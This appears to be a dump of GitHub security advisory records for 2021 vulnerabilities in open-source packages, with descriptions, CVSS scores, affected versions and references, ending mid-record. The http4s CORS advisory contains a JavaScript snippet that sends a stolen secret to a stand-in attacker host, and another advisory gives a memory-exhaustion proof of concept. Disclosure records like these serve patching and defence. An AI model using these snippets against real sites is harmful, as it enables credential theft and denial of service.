1.4.0 | GHSA-5rwj-j5m3-3chj | 2021-10-21T14:28:07Z | 2021-09-01T18:25:16Z | null | ['CVE-2021-39176'] | Missing Release of Memory after Effective Lifetime in detect-character-encoding | ### Impact
In detect-character-encoding v0.3.0 and earlier, allocated memory is not released.
### Patches
The problem has been patched in [detect-character-encoding v0.3.1](https://github.com/sonicdoe/detect-character-encoding/releases/tag/v0.3.1).
### CVSS score
[CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/RL:O/RC:C](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/RL:O/RC:C)
Base Score: 7.5 (High)
Temporal Score: 7.2 (High)
Since detect-character-encoding is a library, the scoring is based on the “[reasonable worst-case implementation scenario](https://www.first.org/cvss/v3.1/user-guide#3-7-Scoring-Vulnerabilities-in-Software-Libraries-and-Similar)”, namely, using detect-character-encoding in a program accessible over the internet which becomes unavailable when running out of memory. Depending on your specific implementation, the vulnerability’s severity in your program may be different.
### Proof of concept
```js
const express = require("express");
const detectCharacterEncoding = require("detect-character-encoding");
const app = express();
app.get("/", (req, res) => {
detectCharacterEncoding(Buffer.from("foo"));
res.end();
});
app.listen(3000);
```
`hey -n 1000000 http://localhost:3000` ([`hey`](https://github.com/rakyll/hey)) causes the Node.js process to consume more and more memory.
### References
- https://github.com/sonicdoe/detect-character-encoding/commit/d44356927b92e3b13e178071bf6d7c671766f588
- https://github.com/sonicdoe/detect-character-encoding/pull/6 | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': 'detect-character-encoding'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/sonicdoe/detect-character-encoding/security/advisories/GHSA-5rwj-j5m3-3chj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39176'}, {'type': 'WEB', 'url': 'https://github.com/sonicdoe/detect-character-encoding/pull/6'}, {'type': 'WEB', 'url': 'https://github.com/sonicdoe/detect-character-encoding/commit/d44356927b92e3b13e178071bf6d7c671766f588'}, {'type': 'PACKAGE', 'url': 'https://github.com/sonicdoe/detect-character-encoding'}, {'type': 'WEB', 'url': 'https://github.com/sonicdoe/detect-character-encoding/releases/tag/v0.3.1'}] | {'cwe_ids': ['CWE-401'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-31T19:58:46Z', 'nvd_published_at': '2021-08-31T18:15:00Z'} |
1.4.0 | GHSA-44c6-4v22-4mhx | 2023-07-11T13:37:50Z | 2021-09-20T20:42:25Z | null | ['CVE-2021-3795'] | semver-regex Regular Expression Denial of Service (ReDOS) | npm `semver-regex` is vulnerable to Inefficient Regular Expression Complexity | [{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': 'semver-regex'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'semver-regex'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.1'}]}], 'versions': ['4.0.0']}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3795'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/semver-regex/commit/11c66245f4e1976dccc52977ed183696a21a3fd7'}, {'type': 'PACKAGE', 'url': 'https://github.com/sindresorhus/semver-regex'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/006624e3-35ac-448f-aab9-7b5183f30e28'}] | {'cwe_ids': ['CWE-1333', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-16T17:31:51Z', 'nvd_published_at': '2021-09-15T17:15:00Z'} |
1.4.0 | GHSA-hpf7-4c2g-9chf | 2021-09-30T18:36:14Z | 2021-09-23T23:17:07Z | null | ['CVE-2021-31819'] | Remote Code Execution in Halibut | In Halibut versions prior to 4.4.7 there is a deserialisation vulnerability that could allow remote code execution on systems that already trust each other based on certificate verification. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'NuGet', 'name': 'Halibut'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.7'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31819'}, {'type': 'WEB', 'url': 'https://advisories.octopus.com/adv/2021-08---Remote-Code-Execution-via-Deserialisation-in-the-Halibut-Protocol-(CVE-2021-31819).2250309681.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/OctopusDeploy/Halibut'}] | {'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-23T17:18:19Z', 'nvd_published_at': '2021-09-22T02:15:00Z'} |
1.4.0 | GHSA-947x-pv47-pp3q | 2021-08-26T15:00:34Z | 2021-09-02T17:16:18Z | null | ['CVE-2021-39286'] | Cross-site scripting in pywb | Webrecorder pywb before 2.6.0 allows XSS because it does not ensure that Jinja2 templates are autoescaped. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'pywb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39286'}, {'type': 'WEB', 'url': 'https://github.com/webrecorder/pywb/commit/f7bd84cdacdd665ff73ae8d09a202f60be2ebae9'}, {'type': 'PACKAGE', 'url': 'https://github.com/webrecorder/pywb'}, {'type': 'WEB', 'url': 'https://github.com/webrecorder/pywb/compare/v-2.5.0...v-2.6.0'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T15:00:34Z', 'nvd_published_at': '2021-08-18T18:15:00Z'} |
1.4.0 | GHSA-c8x3-rg72-fwwg | 2021-09-14T18:46:53Z | 2021-09-08T20:14:38Z | null | ['CVE-2021-37218'] | Privilege escalation in Hashicorp Nomad | HashiCorp Nomad and Nomad Enterprise Raft RPC layer allows non-server agents with a valid certificate signed by the same CA to access server-only functionality, enabling privilege escalation. Fixed in 1.0.10 and 1.1.4. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.10'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '1.1.4'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37218'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-21-nomad-raft-rpc-privilege-escalation/29023'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/nomad'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/nomad'}] | {'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-08T18:12:37Z', 'nvd_published_at': '2021-09-07T12:15:00Z'} |
1.4.0 | GHSA-52cf-226f-rhr6 | 2021-09-02T18:55:34Z | 2021-09-02T16:52:18Z | null | ['CVE-2021-39185'] | Default CORS config allows any origin with credentials | ### Impact
#### Origin reflection attack
The default CORS configuration is vulnerable to an origin reflection attack. Take the following http4s app `app`, using the default CORS config, running at https://vulnerable.example.com:
```scala
val routes: HttpRoutes[F] = HttpRoutes.of {
case req if req.pathInfo === "/secret" =>
Response(Ok).withEntity(password).pure[F]
}
val app = CORS(routes.orNotFound)
```
The following request is made to our server:
```http
GET /secret HTTP/1.1
Host: vulnerable.example.com
Origin: https://adversary.example.net
Cookie: sessionId=...
```
When the `anyOrigin` flag of `CORSConfig` is `true`, as is the case in the default argument to `CORS`, the middleware will allow sharing its resource regardless of the `allowedOrigins` setting. Paired with the default `allowCredentials`, the server approves sharing responses that may have required credentials for sensitive information with any origin:
```http
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://adversary.example.org
Access-Control-Allow-Credentials: true
Content-Type: text/plain
p4ssw0rd
```
A malicious script running on `https://adversary.example.org/` can then exfiltrate sensitive information with the user's credentials to `vulnerable.exmaple.org`:
```javascript
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable.example.org/secret',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//bad-people.example.org/log?key='+this.responseText;
};
```
#### Null origin attack
The middleware is also susceptible to a Null Origin Attack. A user agent may send `Origin: null` when a request is made from a sandboxed iframe. The CORS-wrapped http4s app will respond with `Access-Control-Allow-Origin: null`, permitting a similar exfiltration of secrets to the above.
### Patches
The problem is fixed in 0.21.27, 0.22.3, 0.23.2, and 1.0.0-M25. The original `CORS` implementation and `CORSConfig` are deprecated. In addition to the origin vulnerability, the following deficiencies in the deprecated version are fixed in the new signatures:
### Migration
The `CORS` object exposes a default `CORSPolicy` via `CORS.policy`. This can be configured with various `with*` methods, like any http4s builder. Finally, the `CORSPolicy` may be applied to any `Http`, like any other http4s middleware:
```scala
val routes: HttpRoutes[F] = ???
val cors = CORS.policy
.withAllowOriginAll
.withAllowCredentials(false)
.apply(routes)
```
### Workarounds
It is possible to be safe in unpatched versions, but note the following defects exist:
* The `anyMethod` flag, enabled by default, accepts methods that cannot be enumerated in the `Access-Control-Allow-Methods` preflight response.
* Rejected CORS requests receive a `403` response, when the client should be the enforcement point. The server should just omit all CORS response headers.
* Does not send `Vary: Access-Control-Request-Headers` on preflight requests. This may confuse caches.
* Does not validate the `Access-Control-Request-Headers` of a preflight request. This validation is not mandated by the Fetch standard, but is typical of most server implementations.
* Needlessly sends `Vary: Access-Control-Request-Method` on non-preflight requests. This should be harmless in practice.
* Needlessly sends `Access-Control-Max-Age` header on non-preflight requests. This should be harmless in practice.
* Sends an invalid `Access-Control-Allow-Credentials: false` instead of omitting the header. This should be harmless in practice.
#### Explicit origins
In versions before the patch, set `anyOrigin` to `false`, and then specifically include trusted origins in `allowedOrigins`.
##### 0.21.x
```scala
val routes: HttpRoutes[F] = ???
val config = CORS.DefaultConfig.copy(
anyOrigin = false,
allowOrigins = Set("http://trusted.example.com")
)
val cors = CORS(routes, config)
```
###### 0.22.x, 0.23.x, 1.x
```scala
val routes: HttpRoutes[F] = ???
val config = CORSConfig.default
.withAnyOrigin(false)
.withAllowedOrigins(Set("http://trusted.example.com"))
val cors = CORS(routes, config)
```
#### Disable credentials
Alternatively, sharing responses tainted by credentials can be deprecated.
##### 0.21.x
```scala
val routes: HttpRoutes[F] = ???
val config = CORS.DefaultConfig.copy(allowCredentials = false)
val cors = CORS(routes, config)
```
##### 0.22.x, 0.23.x, 1.x
```scala
val routes: HttpRoutes[F] = ???
val config = CORSConfig.default.withAllowedCredentials(false)
val cors = CORS(routes, config)
```
### References
* The [MDN guide to CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS)
* [PayloadsAllTheThings CORS misconfiguration](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/6cba7ceda93c3f64559c3e73881c21076536e5fb/CORS%20Misconfiguration/README.md)
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [GitHub](http://github.com/http4s/http4s)
* Contact us via the [http4s security policy](https://github.com/http4s/http4s/security/policy) | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.21.27'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.22.0'}, {'fixed': '0.22.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.23.0'}, {'fixed': '0.23.2'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/http4s/http4s/security/advisories/GHSA-52cf-226f-rhr6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39185'}, {'type': 'PACKAGE', 'url': 'https://github.com/http4s/http4s'}, {'type': 'WEB', 'url': 'https://github.com/http4s/http4s/releases/tag/v0.23.2'}] | {'cwe_ids': ['CWE-346'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-01T19:31:53Z', 'nvd_published_at': '2021-09-01T20:15:00Z'} |
1.4.0 | GHSA-h77f-xxx7-4858 | 2021-09-07T14:04:02Z | 2021-09-07T23:04:04Z | null | ['CVE-2021-39177'] | User impersonation due to incorrect handling of the login JWT | ### Impact
<!--_What kind of vulnerability is it? Who is impacted?_-->
This allows anyone that can connect to the server to forge a LoginPacket with manipulated JWT token allowing impersonation as any Bedrock user. Unless credentials are saved in your configuration, online mode is not affected as users are still required to log in separately. If your credentials are saved, there is no risk of exposing your email or password.
### Patches
<!--_Has the problem been patched? What versions should users upgrade to?_-->
This was patched as part of https://github.com/GeyserMC/Geyser/commit/b9541505af68ac7b7c093206ac7b1ba88957a5a6 and https://github.com/GeyserMC/Geyser/commit/ab2f5b326fe590e09167e8b45b4b165ac06ecd13. if your Geyser version is `1.4.2-SNAPSHOT` or later, the issue has been addressed on your build.
### Workarounds
<!--_Is there a way for users to fix or remediate the vulnerability without upgrading?_-->
Geyser strongly recommends updating to fix this issue. If this isn't possible:
- Use online mode and don't save credentials in your Geyser configuration
- Use an additional authentication method on the Java server
### References
<!--_Are there any links users can visit to find out more?_-->
This was disclosed to us by a staff member over at Hive; you can read their disclosure here: https://updates.playhive.com/weekend-maintenance-disclosure-2kJMaY
### For more information
If you have any questions or comments about this advisory:
* Come talk to us over on our [Discord](https://discord.gg/geysermc) server in the [#development](https://discord.com/channels/613163671870242838/613170125696270357) channel
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.geysermc:connector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.2-SNAPSHOT'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.4.1-SNAPSHOT'}}] | [{'type': 'WEB', 'url': 'https://github.com/GeyserMC/Geyser/security/advisories/GHSA-h77f-xxx7-4858'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39177'}, {'type': 'WEB', 'url': 'https://github.com/GeyserMC/Geyser/commit/b9541505af68ac7b7c093206ac7b1ba88957a5a6'}, {'type': 'PACKAGE', 'url': 'https://github.com/GeyserMC/Geyser'}, {'type': 'WEB', 'url': 'https://updates.playhive.com/weekend-maintenance-disclosure-2kJMaY'}] | {'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-07T14:04:02Z', 'nvd_published_at': '2021-08-30T23:15:00Z'} |
1.4.0 | GHSA-49x3-8228-3w3m | 2021-09-20T18:59:46Z | 2021-09-20T20:18:39Z | null | ['CVE-2021-3810'] | Inefficient Regular Expression Complexity in code-server | code-server is vulnerable to Inefficient Regular Expression Complexity | [{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': 'code-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.12.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3810'}, {'type': 'WEB', 'url': 'https://github.com/cdr/code-server/commit/ca617df135e78833f93c8320cb2d2cf8bba809f5'}, {'type': 'PACKAGE', 'url': 'https://github.com/cdr/code-server'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/38888513-30fc-4d8f-805d-34070d60e223'}] | {'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-20T18:59:46Z', 'nvd_published_at': '2021-09-17T07:15:00Z'} |
1.4.0 | GHSA-v9w2-v7j9-rjpr | 2021-09-13T20:27:30Z | 2021-09-02T22:02:36Z | null | ['CVE-2021-34435'] | Remote code execution in Eclipse Theia | In Eclipse Theia 0.3.9 to 1.8.1, the "mini-browser" extension allows a user to preview HTML files in an iframe inside the IDE. But with the way it is made it is possible for a previewed HTML file to trigger an RCE. This exploit only happens if a user previews a malicious file. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': '@theia/mini-browser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.9'}, {'fixed': '1.9.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-34435'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-theia/theia/pull/8759'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-theia/theia/commit/0761dcf5fe3c14c27432683d42d2c526ad0cfbd5'}, {'type': 'WEB', 'url': 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=568018'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse-theia/theia'}] | {'cwe_ids': ['CWE-346', 'CWE-668', 'CWE-942'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-02T17:12:13Z', 'nvd_published_at': '2021-09-01T18:15:00Z'} |
1.4.0 | GHSA-c36v-fmgq-m8hx | 2022-09-11T22:24:21Z | 2021-09-07T22:57:14Z | null | ['CVE-2021-3757'] | Prototype Pollution in immer | immer is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'). | [{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': 'immer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.0.6'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3757'}, {'type': 'WEB', 'url': 'https://github.com/immerjs/immer/commit/fa671e55ee9bd42ae08cc239102b665a23958237'}, {'type': 'PACKAGE', 'url': 'https://github.com/immerjs/immer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/23d38099-71cd-42ed-a77a-71e68094adfa'}] | {'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-03T20:17:21Z', 'nvd_published_at': '2021-09-02T12:15:00Z'} |
1.4.0 | GHSA-356r-77q8-f64f | 2021-09-30T18:35:17Z | 2021-09-29T17:12:37Z | null | ['CVE-2021-3819'] | Cross-Site Request Forgery in firefly-iii | firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF). This has been mitigated in version 5.6.1 | [{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/578f350498b75f31d321c78a608c7f7b3b7b07e9'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/da82f7b6-4ffc-4109-87a4-a2a790bd44e5'}] | {'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-28T20:06:09Z', 'nvd_published_at': '2021-09-27T13:15:00Z'} |
1.4.0 | GHSA-g485-29gq-6h2h | 2021-08-30T18:51:00Z | 2021-09-01T18:36:24Z | null | ['CVE-2021-36786'] | Sensitive Data Exposure in miniorange_saml | The miniorange_saml (aka Miniorange Saml) extension before 1.4.3 for TYPO3 allows Sensitive Data Exposure of API credentials and private keys. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'miniorange/miniorange-saml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.3'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36786'}, {'type': 'PACKAGE', 'url': 'https://github.com/miniOrangeDev/miniorange-saml-typo3-sso'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-011'}] | {'cwe_ids': ['CWE-922'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T18:51:00Z', 'nvd_published_at': '2021-08-13T17:15:00Z'} |
1.4.0 | GHSA-86pv-95mj-7w5f | 2021-08-30T18:05:04Z | 2021-09-01T18:40:48Z | null | ['CVE-2021-27910'] | Stored XSS vulnerability on Bounce Management Callback | ### Impact
Insufficient sanitization / filtering allows for arbitrary JavaScript Injection in Mautic using the bounce management callback function. The values submitted in the "error" and "error_related_to" parameters of the POST request of the bounce management callback will be permanently stored and executed once the details page of an affected lead is opened by a Mautic user.
An attacker with access to the bounce management callback function (identified with the Mailjet webhook, but it is assumed this will work uniformly across all kinds of webhooks) can inject arbitrary JavaScript Code into the "error" and "error_related_to" parameters of the POST request (POST /mailer/<product / webhook>/callback). It is noted that there is no authentication needed to access this function.
The JavaScript Code is stored permanently in the web application and executed every time an authenticated user views the details page of a single contact / lead in Mautic. This means, arbitrary code can be executed to, e.g., steal or tamper with information.
### Patches
Upgrade to 3.3.4 or 4.0.0
### Workarounds
No
### References
https://github.com/mautic/mautic/releases/tag/3.3.4
https://github.com/mautic/mautic/releases/tag/4.0.0
### For more information
If you have any questions or comments about this advisory:
* Email us at [security@mautic.org](mailto:security@mautic.org)
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'mautic/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.4'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/mautic/mautic/security/advisories/GHSA-86pv-95mj-7w5f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27910'}, {'type': 'WEB', 'url': 'https://github.com/mautic/mautic/commit/e6a405975342f3cf86aa71927618d31d25135fa3'}, {'type': 'PACKAGE', 'url': 'https://github.com/mautic/mautic'}] | {'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T18:05:04Z', 'nvd_published_at': '2021-08-30T16:15:00Z'} |
1.4.0 | GHSA-hq3v-rg6f-6hx4 | 2021-08-30T20:28:40Z | 2021-09-01T18:35:34Z | null | ['CVE-2021-3689'] | Use of Insufficiently Random Values in yiisoft/yii2-dev | yii2 is vulnerable to Use of Predictable Algorithm in Random Number Generator | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'yiisoft/yii2-dev'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.43'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3689'}, {'type': 'WEB', 'url': 'https://github.com/yiisoft/yii2/commit/13f27e4d920a05d53236139e8b07007acd046a46'}, {'type': 'PACKAGE', 'url': 'https://github.com/yiisoft/yii2'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/50aad1d4-eb00-4573-b8a4-dbe38e2c229f'}] | {'cwe_ids': ['CWE-330'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T20:28:40Z', 'nvd_published_at': '2021-08-10T11:15:00Z'} |
1.4.0 | GHSA-3q6g-vf58-7m4g | 2021-09-21T14:51:23Z | 2021-09-08T15:41:15Z | null | ['CVE-2021-32838'] | Regular Expression Denial of Service in flask-restx | Flask RESTX contains a regular expression that is vulnerable to [ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) (Regular Expression Denial of Service) in `email_regex`.
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'flask-restx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/python-restx/flask-restx/security/advisories/GHSA-3q6g-vf58-7m4g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32838'}, {'type': 'WEB', 'url': 'https://github.com/python-restx/flask-restx/issues/372'}, {'type': 'WEB', 'url': 'https://github.com/python-restx/flask-restx/commit/bab31e085f355dd73858fd3715f7ed71849656da'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-3q6g-vf58-7m4g'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-restx/flask-restx'}, {'type': 'WEB', 'url': 'https://github.com/python-restx/flask-restx/blob/fd99fe11a88531f5f3441a278f7020589f9d2cc0/flask_restx/inputs.py#L51'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5UCTFVDU3677B5OBGK4EF5NMUPJLL6SQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QUD6SWZLX52AAZUHDETJ2CDMQGEPGFL3/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/flask-restx/'}] | {'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-07T14:24:52Z', 'nvd_published_at': '2021-09-20T18:15:00Z'} |
1.4.0 | GHSA-45w7-7g63-2m5w | 2023-06-13T20:53:05Z | 2021-09-01T18:30:55Z | null | ['CVE-2021-28035'] | Drop of uninitialized memory in stack_dst | Affected versions of stack_dst used a push_inner function that increased the internal length of the array and then called val.clone(). If the val.clone() call panics, the stack could drop an already dropped element or drop uninitialized memory. This issue was fixed in `2a4d538` by increasing the length of the array after elements are cloned.
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'crates.io', 'name': 'stack_dst'}, 'ecosystem_specific': {'affected_functions': ['stack_dst::StackA::push_cloned']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28035'}, {'type': 'WEB', 'url': 'https://github.com/thepowersgang/stack_dst-rs/issues/5'}, {'type': 'WEB', 'url': 'https://github.com/thepowersgang/stack_dst-rs/commit/2a4d538'}, {'type': 'PACKAGE', 'url': 'https://github.com/thepowersgang/stack_dst-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0033.html'}] | {'cwe_ids': ['CWE-908'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T21:56:02Z', 'nvd_published_at': '2021-03-05T09:15:00Z'} |
1.4.0 | GHSA-58g2-9fqr-36q2 | 2021-09-10T17:08:40Z | 2021-09-02T22:01:01Z | null | ['CVE-2021-23426'] | Prototype Pollution in Proto | This affects all versions of package Proto. It is possible to inject pollute the object property of an application using Proto by leveraging the merge function. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'Proto'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.4'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23426'}, {'type': 'PACKAGE', 'url': 'https://github.com/adriancmiranda/Proto'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PROTO-1316301'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/Proto'}] | {'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 